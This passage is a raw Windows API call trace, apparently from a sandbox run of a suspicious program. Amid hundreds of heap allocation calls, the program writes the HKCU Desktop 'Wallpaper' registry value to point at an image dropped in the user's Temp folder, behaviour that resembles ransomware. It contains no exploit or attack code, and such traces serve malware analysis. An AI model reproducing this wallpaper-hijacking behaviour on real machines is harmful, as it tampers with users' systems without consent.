RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0311.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0311.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0311.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0311.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0311.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0311.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0311.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0311.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0311.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0311.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0311.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0311.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0311.349] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0311.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0311.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0311.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0311.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0311.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0311.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0311.350] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0311.350] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0311.350] RegCloseKey (hKey=0x294) returned 0x0 [0311.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0311.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0311.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0311.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0311.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0311.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0311.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0311.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0311.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0311.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0311.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0311.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0311.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0311.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0311.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0311.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0311.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0311.351] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0311.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0311.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0311.351] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0311.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0311.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0311.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0311.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1758 [0311.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0311.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0311.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0311.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0311.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0311.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0311.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0311.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0311.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0311.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0311.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0311.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0311.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0311.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0311.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0311.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0311.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab20 [0311.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0311.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0311.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0311.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0311.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0311.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0311.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0311.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0311.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0311.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0311.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0311.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0311.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0311.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8c8 [0311.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0311.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0311.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0311.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0311.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0311.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0311.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0311.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0311.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0311.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0311.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0311.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0311.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0311.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0311.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8c8 [0311.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0311.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0311.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0311.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0311.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0311.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0311.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0311.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0311.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0311.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0311.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0311.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0311.355] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0311.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0311.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0311.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0311.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0311.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0311.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0311.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0311.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0311.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0311.355] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0311.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0311.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0311.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0311.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0311.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0311.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0311.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0311.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0311.356] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0311.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0311.356] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0311.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0311.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0311.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0311.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0311.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0311.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0311.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0311.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0311.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0311.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0311.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0311.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0311.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0311.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0311.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0311.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0311.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0311.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0311.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0311.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0311.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0311.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0311.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0311.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0311.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0311.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0311.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0311.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0311.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0311.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0311.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0311.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0311.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0311.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0311.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0311.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0311.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0311.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0311.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0311.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0311.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0311.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0311.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0311.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0311.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0311.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0311.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0311.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0311.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0311.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0311.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0311.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0311.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0311.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0311.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0311.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0311.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0311.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0311.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0311.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0311.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0311.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0311.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0311.362] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0311.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0311.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0311.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0311.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0311.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0311.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0311.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0311.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0311.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0311.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0311.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0311.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0311.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0311.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0311.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0311.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0311.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0311.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0311.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0311.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0311.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0311.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0311.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0311.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0311.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0311.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0311.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0311.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0311.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0311.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0311.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0311.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0311.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0311.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0311.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0311.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0311.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0311.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0311.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0311.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0311.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0311.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0311.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0311.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0311.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0311.367] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0311.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0311.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 